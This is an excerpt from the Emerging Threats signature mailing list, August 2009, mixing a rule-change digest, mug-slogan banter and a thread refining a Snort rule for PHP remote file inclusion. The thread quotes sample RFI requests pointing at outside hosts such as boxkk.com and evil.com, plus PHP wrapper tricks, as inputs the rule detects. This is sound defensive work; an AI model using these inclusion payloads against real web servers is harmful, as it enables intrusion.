> funny or profound in some way. :) > > > > > > Get your tshirts here: > > > > > http://www.emergingthreats.net/index.php/support-et-and-buy-et-schwag. > > > html > > > > > > I'm looking forward to the ideas for the saying on the mugs. We may > > > even do a run of shirts with it if they keep selling! > > > > > > Thanks > > > > > > Matt > > > > > > > > > > _______________________________________________ > > Emerging-sigs mailing list > > Emerging-sigs at emergingthreats.net > > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090805/b8f1932a/attachment-0001.html From emerging at emergingthreats.net Wed Aug 5 16:00:11 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Wed, 5 Aug 2009 16:00:11 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090805200011.B95204504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Wed Aug 5 16:00:11 2009 [***] [///] Modified active rules: [///] 2003520 - ET WEB EXPLOIT webCalendar Remote File include (emerging-web.rules) 2009041 - ET SCAN SQLNinja MSSQL Database User Rights Scan (emerging-scan.rules) 2009042 - ET SCAN SQLNinja MSSQL Authentication Mode Scan (emerging-scan.rules) 2009043 - ET SCAN SQLNinja Attempt To Recreate xp_cmdshell Using sp_configure (emerging-scan.rules) 2009044 - ET SCAN SQLNinja Attempt To Create xp_cmdshell Session (emerging-scan.rules) 2009531 - ET TROJAN Garmania Trojan Check-in (emerging-virus.rules) 2009532 - ET TROJAN Unknown Trojan Check-in (3) (emerging-virus.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (20): 2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Added to emerging-sid-msg.map.txt (20): 2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From Dale_A_Haag at homedepot.com Wed Aug 5 16:23:25 2009 From: Dale_A_Haag at homedepot.com (Haag, Dale A) Date: Wed, 5 Aug 2009 16:23:25 -0400 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: References: Message-ID: Here are my entries: 1. Coffee and Packets; Best if filtered 2. Professional Coffee Research Engineer ( bold font on PCRE ) 3. 1 spoon sugar, 2 spoons [ INSERT ET LOGO HERE ] 4. Start Your Day Right [ INSERT ET LOGO HERE ] ----------------------------------------- The information contained in this e-mail and any attached documents may contain information that is confidential or otherwise protected from disclosure. If you are not the intended recipient of this message, or if this message has been sent to you in error, please immediately alert the sender by reply e-mail and then delete this message, including any attachments. Any dissemination, distribution or other use of the contents of this message by anyone other than the intended recipient is strictly prohibited. From mail at mare-system.de Wed Aug 5 16:56:56 2009 From: mail at mare-system.de (mareadmin) Date: Wed, 05 Aug 2009 22:56:56 +0200 Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt Message-ID: <4A79F218.4010307@mare-system.de> since i wanted to track every single rfi-connection-attempt and monster-list doesnt covers everything i build up some "generic" php-rfi-sic; i tested it, since yesterday no fp, it even gets stuff like GET /some.cgi?p=info/include/reputation/rep_profile.php?pun_user[language]=http://www.boxkk.com/[path]/info.txt? it a modified sid:2002997 alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Generic Remote File Inclusion attempt"; flow:established,to_server; uricontent:".php"; nocase; content:"?"; pcre:"/\=(https?|ftps?|php)\:/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; reference:url,doc.emergingthreats.net/2002997; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP; sid:1122334408; rev:1;) -- mex MARE System Kiel .:. http://www.mare-system.de From frank at knobbe.us Wed Aug 5 18:18:13 2009 From: frank at knobbe.us (Frank Knobbe) Date: Wed, 05 Aug 2009 17:18:13 -0500 Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt In-Reply-To: <4A79F218.4010307@mare-system.de> References: <4A79F218.4010307@mare-system.de> Message-ID: <1249510693.4378.47.camel@localhost> On Wed, 2009-08-05 at 22:56 +0200, mareadmin wrote: > since i wanted to track every single rfi-connection-attempt > and monster-list doesnt covers everything > i build up some "generic" php-rfi-sic; i tested it, since yesterday > no fp, it even gets stuff like > GET /some.cgi?p=info/include/reputation/rep_profile.php?pun_user[language]=http://www.boxkk.com/[path]/info.txt? > > it a modified sid:2002997 > > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Generic Remote File Inclusion attempt"; flow:established,to_server; uricontent:".php"; nocase; content:"?"; pcre:"/\=(https?|ftps?|php)\:/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; reference:url,doc.emergingthreats.net/2002997; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP; sid:1122334408; rev:1;) What is the purpose of adding "php" to the URI check? Have you see requests like "vuln.asp?inclue=php://evil.com/test.txt" ? 'Cause the pcre only matches for any =http, =https, =ftp, or =ftps in the URL. I can't see =php:// being a valid URI. I agree that the old 2002997 needs to be updated (for example, add "profile" to the list of matches), but just matching on ".php" with any "=http" in the packet will cause a ton of falses. How big are the networks you tested this on? Regards, Frank -- It is said that the Internet is a public utility. As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 188 bytes Desc: This is a digitally signed message part Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090805/6efe124c/attachment.bin From kevross33 at googlemail.com Wed Aug 5 18:53:25 2009 From: kevross33 at googlemail.com (Kevin Ross) Date: Wed, 5 Aug 2009 23:53:25 +0100 Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt In-Reply-To: <4A79F218.4010307@mare-system.de> References: <4A79F218.4010307@mare-system.de> Message-ID: It is best to have RFI sigs spread out avoiding PCRE for load. PCRE is a ten fold performance decrease so having three serpate sigs theoretically saves a seven fold performance decrease. I submitted ones for PHP Inclusion as well as RFI earlier today. Most of them I suggest to be disabled for most people and the sigs seemed fine for a 20,000 user network. Kev 2009/8/5 mareadmin > > since i wanted to track every single rfi-connection-attempt > and monster-list doesnt covers everything > i build up some "generic" php-rfi-sic; i tested it, since yesterday > no fp, it even gets stuff like > GET /some.cgi?p=info/include/reputation/rep_profile.php?pun_user[language]= > http://www.boxkk.com/[path]/info.txt > ? > > it a modified sid:2002997 > > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP > Generic Remote File Inclusion attempt"; flow:established,to_server; > uricontent:".php"; nocase; content:"?"; pcre:"/\=(https?|ftps?|php)\:/Ui"; > reference:url,www.sans.org/top20/; classtype:web-application-attack; > reference:url,doc.emergingthreats.net/2002997; reference:url, > www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP; > sid:1122334408; rev:1;) > > -- > > > mex > > > MARE System Kiel .:. http://www.mare-system.de > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090805/acf423a6/attachment.html From jamie.riden at gmail.com Thu Aug 6 01:57:58 2009 From: jamie.riden at gmail.com (Jamie Riden) Date: Thu, 6 Aug 2009 06:57:58 +0100 Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt In-Reply-To: <1249510693.4378.47.camel@localhost> References: <4A79F218.4010307@mare-system.de> <1249510693.4378.47.camel@localhost> Message-ID: <17b0fcab0908052257u632540a8y3113267270b4c269@mail.gmail.com> 2009/8/5 Frank Knobbe : > On Wed, 2009-08-05 at 22:56 +0200, mareadmin wrote: >> since i wanted to track every single rfi-connection-attempt >> and monster-list doesnt covers everything >> i build up some "generic" php-rfi-sic; i tested it, since yesterday >> no fp, it even gets stuff like >> GET /some.cgi?p=info/include/reputation/rep_profile.php?pun_user[language]=http://www.boxkk.com/[path]/info.txt? >> >> it a modified sid:2002997 >> >> >> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Generic Remote File Inclusion attempt"; flow:established,to_server; uricontent:".php"; nocase; content:"?"; pcre:"/\=(https?|ftps?|php)\:/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; reference:url,doc.emergingthreats.net/2002997; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP; sid:1122334408; rev:1;) > > > What is the purpose of adding "php" to the URI check? Have you see > requests like "vuln.asp?inclue=php://evil.com/test.txt" ? > > 'Cause the pcre only matches for any =http, =https, =ftp, or =ftps in > the URL. I can't see =php:// being a valid URI. I love the smell of optimism in the mornings :) See http://us.php.net/manual/en/wrappers.php, particularly http://us.php.net/manual/en/wrappers.php.php "php://input" can be the raw POST data for example. also, an example given for php://filter: readfile("php://filter/resource=http://www.example.com"); cheers, Jamie -- Jamie Riden / jamesr at europe.com / jamie at honeynet.org.uk http://www.ukhoneynet.org/members/jamie/ From mail at mare-system.de Thu Aug 6 07:04:10 2009 From: mail at mare-system.de (mareadmin) Date: Thu, 06 Aug 2009 13:04:10 +0200 Subject: [Emerging-Sigs] PHP Generic Remote File Inclusion attempt Message-ID: <4A7AB8AA.4050401@mare-system.de> > > > I agree that the old 2002997 needs to be updated (for example, add > "profile" to the list of matches), but just matching on ".php" with any > "=http" in the packet will cause a ton of falses. no, i dont think so, since its flow:to_server; maybe to put content:"GET"; offset:0; or a total_depth of 200 in there for performance, or pcre:"/../R"; but i dont think of massive fp. when i have code running that allows RFI on any way via uri-request than i should fire dem programmerz ;-) thinking of webservers/webapps i cant imagine why one would want to have rfis allowed. mex MARE System Kiel .:. http://www.mare-system.de From jonkman at jonkmans.com Thu Aug 6 12:28:54 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 06 Aug 2009 12:28:54 -0400 Subject: [Emerging-Sigs] Snort Validator Message-ID: <4A7B04C6.5010601@jonkmans.com> Decoder's Snort Validator is being used here to keep your rules clean and fresh. It's a great script, we've had it in palce since about the last time we had a ruleset error get published. (few months now) :) We've got a wiki page up for it and decoder has generously decided to publish. This script will be very useful for everyone that has any local rulesets. Highly recommend using it. You can find information and downloads here: http://doc.emergingthreats.net/bin/view/Main/SnortValidator Thanks again decoder! Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From evilghost at packetmail.net Thu Aug 6 12:46:04 2009 From: evilghost at packetmail.net (evilghost@packetmail.net) Date: Thu, 6 Aug 2009 11:46:04 -0500 Subject: [Emerging-Sigs] Second Try; For review; ISC/Twitter/Google ET Sigs Message-ID: <4A7B08CC.2080806@packetmail.net> John, thanks for these sigs, they're working well and firing like crazy today. I also noticed Google running a bit slower than normal so I suspect we'll see the remainder of the sigs firing soon. Wonder if ISC will go 'Yellow' because their twitters aren't tweeting... or something... Joel, hang in there buddy ;) - evilghost John Jacobs wrote: > Well that's annoying. Hopefully this works: > > Hello ET, first and foremost thank you for the strong effort and > excellent signatures. As such, in an attempt to give back to a > wonderful community, I humbly submit the following Snort rules for > inclusion into the ET signatures. A brief explanation is provided below: > > The first signature is designed to detect Google non-security related > announcement articles on the ISC Diary; this seems to be a topic of > extreme interest for some ISC Handlers despite having little to no > security value. I am unsure if this is a result of "Slow News Day" > syndrome or another behavioral oddity which manifests at ISC. This will > detect on "Google is slow" style articles as well, however, I am sure > this signature will require more tweaking as ISC encourages handing over > more personal data to a 3rd party under the guise of functionality. > > The second signature is designed to detect Joel peddling Twitter on the > isc.sans.org Diary, as again, this isn't security related. I suspect > the Twitter signature may tend to fire more than the Google as Joel > tends to get excited about "Tweeting" and "Twittering" and this spills > over into the ISC Diary anytime he's the "Handler on Duty". > > As always, please feel free to make changes to this signatures, > especially regarding performance. I've placed these into ET POLICY but > they may be more applicable in another classes, perhaps a blocking > class. I thank you in advance, feel free to modify for PCRE as well. > > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY > isc.sans.org Access"; flowbits:set,isc_sans; flowbits:noalert; > flow:established,to_server; content:"|0D 0A|Host|3A > 20|isc|2E|sans|2E|org|0D 0A|"; reference:url,isc.sans.org/; > classtype:policy-violation; sid:2009xxxx; rev:1;) > > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY > isc.sans.org SANdlers say Google is slow"; flowbits:isset,isc_sans; > flow:established,from_server; content:"google"; nocase; content:"slow"; > nocase; reference:url,isc.sans.org/diary.html?storyid=6388; > reference:url,isc.sans.org/diary.html?storyid=5443; > classtype:policy-annoyance; sid:2009xxxx; rev:1;) > > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET POLICY > isc.sans.org Joel Esler Peddling Twitter"; flowbits:isset,isc_sans; > flow:established,from_server; content:"Joel|20|Esler"; nocase; > content:"Twitter"; nocase; > reference:url,isc.sans.org/diary.html?storyid=6391; > reference:url,isc.sans.org/diary.html?storyid=6388; > classtype:policy-annoyance; sid:2009xxxx; rev:1;) > > - John Jacobs > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs From jonkman at jonkmans.com Thu Aug 6 14:07:06 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 06 Aug 2009 14:07:06 -0400 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: References: Message-ID: <4A7B1BCA.1030906@jonkmans.com> There are so many good ideas I'm getting the better ones together and we'll do a vote. I know the poll thing is hokey, but I think it's the best way to get a good decision made here. Keep sending the ideas for a couple more days then I'll put the poll up and let everyone know. Thanks for the ideas! These are all great. Especially the sourcefire ones. :) Matt Haag, Dale A wrote: > Here are my entries: > > 1. Coffee and Packets; Best if filtered > > 2. Professional > Coffee > Research > Engineer > ( bold font on PCRE ) > > 3. 1 spoon sugar, 2 spoons > [ INSERT ET LOGO HERE ] > > 4. Start Your Day Right > [ INSERT ET LOGO HERE ] > > > ----------------------------------------- > The information contained in this e-mail and any attached documents > may contain information that is confidential or otherwise protected > from disclosure. If you are not the intended recipient of this > message, or if this message has been sent to you in error, please > immediately alert the sender by reply e-mail and then delete this > message, including any attachments. Any dissemination, distribution > or other use of the contents of this message by anyone other than > the intended recipient is strictly prohibited. > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From bschnzl at cotse.net Thu Aug 6 14:15:31 2009 From: bschnzl at cotse.net (Bill Scherr IV) Date: Thu, 06 Aug 2009 14:15:31 -0400 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: <4A7B1BCA.1030906@jonkmans.com> References: , , <4A7B1BCA.1030906@jonkmans.com> Message-ID: Here's One There are only three things you can trust: Coffee Packets [Logo] (Or did someone already post that?) B. Circa 14:07, 6 Aug 2009, a note, claiming source Matt Jonkman , was sent to me: Date sent: Thu, 06 Aug 2009 14:07:06 -0400 From: Matt Jonkman To: "Haag, Dale A" Copies to: emerging-sigs at emergingthreats.net Subject: Re: [Emerging-Sigs] Coffee Cup Slogans > There are so many good ideas I'm getting the better ones together and > we'll do a vote. I know the poll thing is hokey, but I think it's the > best way to get a good decision made here. > > Keep sending the ideas for a couple more days then I'll put the poll up > and let everyone know. > > Thanks for the ideas! These are all great. Especially the sourcefire > ones. :) > > Matt > > Haag, Dale A wrote: > > Here are my entries: > > > > 1. Coffee and Packets; Best if filtered > > > > 2. Professional > > Coffee > > Research > > Engineer > > ( bold font on PCRE ) > > > > 3. 1 spoon sugar, 2 spoons > > [ INSERT ET LOGO HERE ] > > > > 4. Start Your Day Right > > [ INSERT ET LOGO HERE ] > > > > > > ----------------------------------------- > > The information contained in this e-mail and any attached documents > > may contain information that is confidential or otherwise protected > > from disclosure. If you are not the intended recipient of this > > message, or if this message has been sent to you in error, please > > immediately alert the sender by reply e-mail and then delete this > > message, including any attachments. Any dissemination, distribution > > or other use of the contents of this message by anyone other than > > the intended recipient is strictly prohibited. > > _______________________________________________ > > Emerging-sigs mailing list > > Emerging-sigs at emergingthreats.net > > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > -- > -------------------------------------------- > Matthew Jonkman > Emerging Threats > Open Information Security Foundation (OISF) > Phone 765-429-0398 > Fax 312-264-0205 > http://www.emergingthreats.net > http://www.openinformationsecurityfoundation.org > -------------------------------------------- > > PGP: http://www.jonkmans.com/mattjonkman.asc > > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs Bill Scherr IV, GSEC, GCIA Principal Security Engineer EWA Information and Infrastructure Technologies bscherr at iit-tek.com bscherr at ewa.com 703-478-7608 From David.R.Wharton at regions.com Thu Aug 6 14:15:37 2009 From: David.R.Wharton at regions.com (David.R.Wharton@regions.com) Date: Thu, 6 Aug 2009 13:15:37 -0500 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: <4A7B1BCA.1030906@jonkmans.com> Message-ID: Doesn't look like my submision yesterday made it thru to the list so here it is: pcre:"/C0ffE{2}\s+Ma\x6Bes\s+Me\s[^S]*Regul4r/ig"; -David Matt Jonkman Sent by: emerging-sigs-bounces at emergingthreats.net 08/06/2009 01:07 PM To "Haag, Dale A" cc emerging-sigs at emergingthreats.net Subject Re: [Emerging-Sigs] Coffee Cup Slogans There are so many good ideas I'm getting the better ones together and we'll do a vote. I know the poll thing is hokey, but I think it's the best way to get a good decision made here. Keep sending the ideas for a couple more days then I'll put the poll up and let everyone know. Thanks for the ideas! These are all great. Especially the sourcefire ones. :) Matt Haag, Dale A wrote: > Here are my entries: > > 1. Coffee and Packets; Best if filtered > > 2. Professional > Coffee > Research > Engineer > ( bold font on PCRE ) > > 3. 1 spoon sugar, 2 spoons > [ INSERT ET LOGO HERE ] > > 4. Start Your Day Right > [ INSERT ET LOGO HERE ] > > > ----------------------------------------- > The information contained in this e-mail and any attached documents > may contain information that is confidential or otherwise protected > from disclosure. If you are not the intended recipient of this > message, or if this message has been sent to you in error, please > immediately alert the sender by reply e-mail and then delete this > message, including any attachments. Any dissemination, distribution > or other use of the contents of this message by anyone other than > the intended recipient is strictly prohibited. > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc _______________________________________________ Emerging-sigs mailing list Emerging-sigs at emergingthreats.net http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs From jonkman at jonkmans.com Thu Aug 6 14:17:20 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 06 Aug 2009 14:17:20 -0400 Subject: [Emerging-Sigs] nagios statuswml.cgi sig issue? In-Reply-To: References: Message-ID: <4A7B1E30.9010109@jonkmans.com> That would explain it, snort definitely did not like it. What would you prefer the pcre to be avoiding the backtrack? Matt David.R.Wharton at regions.com wrote: > The original PCRE looks good to me. The purpose of the (?: part is to > tell the PCRE engine not to keep track of a back reference to whatever > matches in the parentheses. It is done for performance reasons but maybe > snort doesn't support it. Making the colon hex removes this functionality > and breaks the signature itself since now it won't match on a 'ping=' > payload. > > For details on the non-capturing group syntax, see the PCRE man page(s) ( > http://www.pcre.org/pcre.txt). > > -David Wharton > > > > > Frank Knobbe > Sent by: emerging-sigs-bounces at emergingthreats.net > 08/04/2009 11:10 AM > > To > Matt Jonkman > cc > Emerging-sigs at emergingthreats.net > Subject > Re: [Emerging-Sigs] nagios statuswml.cgi sig issue? > > > > > > > On Tue, 2009-08-04 at 12:02 -0400, Matt Jonkman wrote: >> Fixed up. Escaping the colon in the pcre caused issues. Made it hex and >> we're good. Thanks Frank! > > I tried that yesterday but it didn't fix the PCRE issue. I'll try again > shortly. > > -Frank > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Thu Aug 6 14:32:16 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 06 Aug 2009 14:32:16 -0400 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: References: Message-ID: <4A7B21B0.5010005@jonkmans.com> Got it! David.R.Wharton at regions.com wrote: > Doesn't look like my submision yesterday made it thru to the list so here > it is: > > pcre:"/C0ffE{2}\s+Ma\x6Bes\s+Me\s[^S]*Regul4r/ig"; > > -David > > > > > Matt Jonkman > Sent by: emerging-sigs-bounces at emergingthreats.net > 08/06/2009 01:07 PM > > To > "Haag, Dale A" > cc > emerging-sigs at emergingthreats.net > Subject > Re: [Emerging-Sigs] Coffee Cup Slogans > > > > > > > There are so many good ideas I'm getting the better ones together and > we'll do a vote. I know the poll thing is hokey, but I think it's the > best way to get a good decision made here. > > Keep sending the ideas for a couple more days then I'll put the poll up > and let everyone know. > > Thanks for the ideas! These are all great. Especially the sourcefire > ones. :) > > Matt > > Haag, Dale A wrote: >> Here are my entries: >> >> 1. Coffee and Packets; Best if filtered >> >> 2. Professional >> Coffee >> Research >> Engineer >> ( bold font on PCRE ) >> >> 3. 1 spoon sugar, 2 spoons >> [ INSERT ET LOGO HERE ] >> >> 4. Start Your Day Right >> [ INSERT ET LOGO HERE ] >> >> >> ----------------------------------------- >> The information contained in this e-mail and any attached documents >> may contain information that is confidential or otherwise protected >> from disclosure. If you are not the intended recipient of this >> message, or if this message has been sent to you in error, please >> immediately alert the sender by reply e-mail and then delete this >> message, including any attachments. Any dissemination, distribution >> or other use of the contents of this message by anyone other than >> the intended recipient is strictly prohibited. >> _______________________________________________ >> Emerging-sigs mailing list >> Emerging-sigs at emergingthreats.net >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Thu Aug 6 14:33:17 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 06 Aug 2009 14:33:17 -0400 Subject: [Emerging-Sigs] Coffee Cup Slogans In-Reply-To: References: , , <4A7B1BCA.1030906@jonkmans.com> Message-ID: <4A7B21ED.5030606@jonkmans.com> Amen! :) Matt Bill Scherr IV wrote: > Here's One > > There are only three things you can trust: > Coffee > Packets > [Logo] > > > (Or did someone already post that?) > B. > > Circa 14:07, 6 Aug 2009, a note, claiming source Matt Jonkman , was sent to me: > > Date sent: Thu, 06 Aug 2009 14:07:06 -0400 > From: Matt Jonkman > To: "Haag, Dale A" > Copies to: emerging-sigs at emergingthreats.net > Subject: Re: [Emerging-Sigs] Coffee Cup Slogans > >> There are so many good ideas I'm getting the better ones together and >> we'll do a vote. I know the poll thing is hokey, but I 